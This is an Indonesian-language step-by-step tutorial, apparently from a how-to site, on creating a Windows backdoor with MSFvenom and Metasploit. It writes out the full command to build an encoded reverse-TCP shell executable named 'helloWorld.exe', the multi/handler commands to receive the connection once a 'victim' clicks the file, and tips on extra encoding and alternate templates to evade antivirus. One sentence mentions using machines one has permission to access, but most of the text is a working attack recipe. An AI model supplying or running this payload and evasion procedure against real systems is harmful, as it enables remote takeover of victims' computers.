Pintu belakang digunakan untuk melewati mekanisme keamanan, seringkali secara diam-diam dan sebagian besar tidak terdeteksi. Menggunakan MSFvenom, kombinasi msfpayload dan msfencode, dimungkinkan untuk membuat backdoor yang menghubungkan kembali ke penyerang dengan menggunakan reverse shell TCP. Untuk mengembangkan pintu belakang, Anda perlu mengubah tanda tangan malware Anda untuk menghindari perangkat lunak antivirus apa pun. Selesaikan proyek ini pada sepasang komputer yang Anda miliki izin untuk mengaksesnya, dan dalam prosesnya, Anda akan mempelajari lebih lanjut tentang keamanan komputer dan cara kerja pintu belakang semacam ini.
Langkah
Langkah 1. Mulai Kali dan jalankan konsol Terminal
Langkah 2. Ketik ifconfig untuk menampilkan antarmuka dan periksa alamat IP Anda
Langkah 3. Ketik msfvenom -l encoder untuk menampilkan daftar encoder
Anda akan menggunakan x86/shikata_ga_nai sebagai encoder
Langkah 4. Ketik "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
- -a x86 --platform windows menunjuk arsitektur untuk digunakan.
- -p windows/Shell/reverse_tcp menunjuk muatan yang akan disematkan.
- LHOST menunjuk alamat IP pendengar.
- LPORT menunjuk port pendengar.
- -b "\x00" menunjuk untuk menghindari karakter buruk (byte nol).
- -e x86/shikata_ga_nai menunjuk nama pembuat enkode.
- -f exe > helloWorld.exe menunjukkan keluaran format.
Langkah 5. Ketik msfconsole untuk mengaktifkan Metasploit
Sekarang Anda telah membuat backdoor Anda. Ketika korban mengklik helloWorld.exe, payload shell yang tertanam akan diaktifkan dan membuat koneksi kembali ke sistem Anda. Untuk menerima koneksi, Anda harus membuka multi-handler di Metasploit dan mengatur muatannya
Langkah 6. Ketik use exploit/multi/handler
Langkah 7. Ketik set payload windows/shell/reverse_tcp
Langkah 8. Ketik show options untuk memeriksa modul
Langkah 9. Ketik set LHOST 192.168.48.129
"LHOST" menunjukkan alamat IP pendengar
Langkah 10. Ketik set LPORT 4444
"LPORT" menunjuk port pendengar
Langkah 11. Ketik run dan tunggu koneksi dari mesin korban
Langkah 12. Tunggu korban mengklik helloWorld.exe
Kemudian Anda akan berhasil terhubung ke mesin korban.
Tips
- Menggunakan -i di MSFvenom akan mewakili iterasi pengkodean. Terkadang lebih banyak iterasi dapat membantu untuk menghindari perangkat lunak AV.
- Anda telah mempelajari cara membuat pintu belakang dan dikodekan dengan menggunakan MSFvenom, tetapi metode ini tidak akan bekerja dengan sempurna pada beberapa perangkat lunak AV saat ini. Alasan di balik ini adalah karena template eksekusi di MSFvenom. Vendor AV telah menambahkan tanda tangan statis dari template ini dan hanya mencarinya. Solusi untuk masalah ini adalah menggunakan templat eksekusi yang berbeda atau alat yang berbeda.